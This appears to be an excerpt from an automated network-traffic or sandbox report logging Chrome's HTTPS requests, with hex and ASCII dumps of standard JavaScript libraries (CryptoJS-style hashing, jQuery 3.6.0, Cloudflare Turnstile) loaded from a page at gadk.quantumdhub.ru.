                                                                                                                                                                                                                                                          2024-12-20 23:35:49 UTC1369INData Raw: 62 75 66 66 65 72 2c 74 2e 62 79 74 65 4f 66 66 73 65 74 2c 74 2e 62 79 74 65 4c 65 6e 67 74 68 29 3a 74 29 69 6e 73 74 61 6e 63 65 6f 66 20 55 69 6e 74 38 41 72 72 61 79 29 7b 66 6f 72 28 76 61 72 20 65 3d 74 2e 62 79 74 65 4c 65 6e 67 74 68 2c 72 3d 5b 5d 2c 69 3d 30 3b 69 3c 65 3b 69 2b 2b 29 72 5b 69 3e 3e 3e 32 5d 7c 3d 74 5b 69 5d 3c 3c 32 34 2d 69 25 34 2a 38 3b 73 2e 63 61 6c 6c 28 74 68 69 73 2c 72 2c 65 29 7d 65 6c 73 65 20 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 7d 29 2e 70 72 6f 74 6f 74 79 70 65 3d 50 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 55 2c 6e 3d 74 2e 6c 69 62 2e 57 6f 72 64 41 72 72 61 79 2c 74 3d 74 2e 65 6e 63 3b 74 2e 55 74 66 31 36 3d 74 2e 55 74 66 31 36 42 45 3d 7b 73 74 72 69 6e 67
                                                                                                                                                                                                                                                          Data Ascii: buffer,t.byteOffset,t.byteLength):t)instanceof Uint8Array){for(var e=t.byteLength,r=[],i=0;i<e;i++)r[i>>>2]|=t[i]<<24-i%4*8;s.call(this,r,e)}else s.apply(this,arguments)}).prototype=P),function(){var t=U,n=t.lib.WordArray,t=t.enc;t.Utf16=t.Utf16BE={string
                                                                                                                                                                                                                                                          2024-12-20 23:35:49 UTC1369INData Raw: 6f 3d 72 2e 63 68 61 72 41 74 28 36 34 29 3b 72 65 74 75 72 6e 21 6f 7c 7c 2d 31 21 3d 3d 28 6f 3d 74 2e 69 6e 64 65 78 4f 66 28 6f 29 29 26 26 28 65 3d 6f 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 72 29 7b 66 6f 72 28 76 61 72 20 69 3d 5b 5d 2c 6e 3d 30 2c 6f 3d 30 3b 6f 3c 65 3b 6f 2b 2b 29 7b 76 61 72 20 73 2c 63 3b 6f 25 34 26 26 28 73 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 2d 31 29 5d 3c 3c 6f 25 34 2a 32 2c 63 3d 72 5b 74 2e 63 68 61 72 43 6f 64 65 41 74 28 6f 29 5d 3e 3e 3e 36 2d 6f 25 34 2a 32 2c 63 3d 73 7c 63 2c 69 5b 6e 3e 3e 3e 32 5d 7c 3d 63 3c 3c 32 34 2d 6e 25 34 2a 38 2c 6e 2b 2b 29 7d 72 65 74 75 72 6e 20 61 2e 63 72 65 61 74 65 28 69 2c 6e 29 7d 28 74 2c 65 2c 69 29 7d 2c 5f 6d 61 70 3a 22 41 42 43 44 45 46 47 48 49 4a 4b
                                                                                                                                                                                                                                                          Data Ascii: o=r.charAt(64);return!o||-1!==(o=t.indexOf(o))&&(e=o),function(t,e,r){for(var i=[],n=0,o=0;o<e;o++){var s,c;o%4&&(s=r[t.charCodeAt(o-1)]<<o%4*2,c=r[t.charCodeAt(o)]>>>6-o%4*2,c=s|c,i[n>>>2]|=c<<24-n%4*8,n++)}return a.create(i,n)}(t,e,i)},_map:"ABCDEFGHIJK
                                                                                                                                                                                                                                                          2024-12-20 23:35:49 UTC1369INData Raw: 2e 61 62 73 28 61 2e 73 69 6e 28 74 2b 31 29 29 7c 30 7d 28 29 3b 65 3d 65 2e 4d 44 35 3d 69 2e 65 78 74 65 6e 64 28 7b 5f 64 6f 52 65 73 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 5f 68 61 73 68 3d 6e 65 77 20 72 2e 69 6e 69 74 28 5b 31 37 33 32 35 38 34 31 39 33 2c 34 30 32 33 32 33 33 34 31 37 2c 32 35 36 32 33 38 33 31 30 32 2c 32 37 31 37 33 33 38 37 38 5d 29 7d 2c 5f 64 6f 50 72 6f 63 65 73 73 42 6c 6f 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 66 6f 72 28 76 61 72 20 72 3d 30 3b 72 3c 31 36 3b 72 2b 2b 29 7b 76 61 72 20 69 3d 65 2b 72 2c 6e 3d 74 5b 69 5d 3b 74 5b 69 5d 3d 31 36 37 31 31 39 33 35 26 28 6e 3c 3c 38 7c 6e 3e 3e 3e 32 34 29 7c 34 32 37 38 32 35 35 33 36 30 26 28 6e 3c 3c 32 34 7c 6e 3e 3e 3e 38 29 7d 76 61 72 20
                                                                                                                                                                                                                                                          Data Ascii: .abs(a.sin(t+1))|0}();e=e.MD5=i.extend({_doReset:function(){this._hash=new r.init([1732584193,4023233417,2562383102,271733878])},_doProcessBlock:function(t,e){for(var r=0;r<16;r++){var i=e+r,n=t[i];t[i]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8)}var
                                                                                                                                                                                                                                                          2024-12-20 23:35:49 UTC1369INData Raw: 41 5b 33 39 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 42 2c 34 2c 41 5b 34 30 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 73 2c 31 31 2c 41 5b 34 31 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 68 2c 31 36 2c 41 5b 34 32 5d 29 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 64 2c 32 33 2c 41 5b 34 33 5d 29 2c 6d 3d 43 28 6d 2c 62 2c 78 2c 53 2c 5f 2c 34 2c 41 5b 34 34 5d 29 2c 53 3d 43 28 53 2c 6d 2c 62 2c 78 2c 67 2c 31 31 2c 41 5b 34 35 5d 29 2c 78 3d 43 28 78 2c 53 2c 6d 2c 62 2c 6b 2c 31 36 2c 41 5b 34 36 5d 29 2c 6d 3d 44 28 6d 2c 62 3d 43 28 62 2c 78 2c 53 2c 6d 2c 61 2c 32 33 2c 41 5b 34 37 5d 29 2c 78 2c 53 2c 73 2c 36 2c 41 5b 34 38 5d 29 2c 53 3d 44 28 53 2c 6d 2c 62 2c 78 2c 75 2c 31 30 2c 41 5b 34 39 5d 29 2c 78 3d 44 28 78 2c 53 2c 6d 2c 62 2c 77
                                                                                                                                                                                                                                                          Data Ascii: A[39]),m=C(m,b,x,S,B,4,A[40]),S=C(S,m,b,x,s,11,A[41]),x=C(x,S,m,b,h,16,A[42]),b=C(b,x,S,m,d,23,A[43]),m=C(m,b,x,S,_,4,A[44]),S=C(S,m,b,x,g,11,A[45]),x=C(x,S,m,b,k,16,A[46]),m=D(m,b=C(b,x,S,m,a,23,A[47]),x,S,s,6,A[48]),S=D(S,m,b,x,u,10,A[49]),x=D(x,S,m,b,w


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          3192.168.2.549720151.101.66.1374433184C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-20 23:35:49 UTC625OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                                                                                                                                                                          Host: code.jquery.com
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                          Referer: https://gadk.quantumdhub.ru/
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-12-20 23:35:49 UTC614INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          Content-Length: 89501
                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                          Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                                                                                                                                          ETag: "28feccc0-15d9d"
                                                                                                                                                                                                                                                          Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                          Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                          Date: Fri, 20 Dec 2024 23:35:49 GMT
                                                                                                                                                                                                                                                          Age: 3259281
                                                                                                                                                                                                                                                          X-Served-By: cache-lga21931-LGA, cache-ewr-kewr1740057-EWR
                                                                                                                                                                                                                                                          X-Cache: HIT, HIT
                                                                                                                                                                                                                                                          X-Cache-Hits: 2774, 27
                                                                                                                                                                                                                                                          X-Timer: S1734737750.662085,VS0,VE0
                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                          2024-12-20 23:35:49 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                                                                                                                                                          Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                                                                                                                                                          2024-12-20 23:35:50 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                                                                                                                                                                                                                          Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                                                                                                                                                                                                                          2024-12-20 23:35:50 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                                                                                                                                                                                                                          Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                                                                                                                                                                                                                          2024-12-20 23:35:50 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                                                                                                                                                                                                                          Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                                                                                                                                                                                                                          2024-12-20 23:35:50 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                                                                                                                                                                                                                          Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                                                                                                                                                                                                                          2024-12-20 23:35:50 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                                                                                                                                                                                                                          Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                          4192.168.2.549721104.18.94.414433184C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                          2024-12-20 23:35:50 UTC650OUTGET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1
                                                                                                                                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                          Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                          Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                          Referer: https://gadk.quantumdhub.ru/
                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                          2024-12-20 23:35:51 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                          Date: Fri, 20 Dec 2024 23:35:51 GMT
                                                                                                                                                                                                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                                          Content-Length: 47692
                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                          accept-ranges: bytes
                                                                                                                                                                                                                                                          last-modified: Tue, 10 Dec 2024 17:31:41 GMT
                                                                                                                                                                                                                                                          cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                                                                                                                                                                          access-control-allow-origin: *
                                                                                                                                                                                                                                                          cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                                                          CF-RAY: 8f53738118938c89-EWR
                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                          2024-12-20 23:35:51 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                                                                                                                                                                                          Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                                                                                                                                                                                                          2024-12-20 23:35:51 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                                                                                                                                                                                                          Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                                                                                                                                                                                                          2024-12-20 23:35:51 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                                                                                                                                                                                                          Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                                                                                                                                                                                                                          2024-12-20 23:35:51 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 59 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                                                                                                                                                                                                                          Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var j;(fu
                                                                                                                                                                                                                                                          2024-12-20 23:35:51 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                                                                                                                                                                                                                          Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
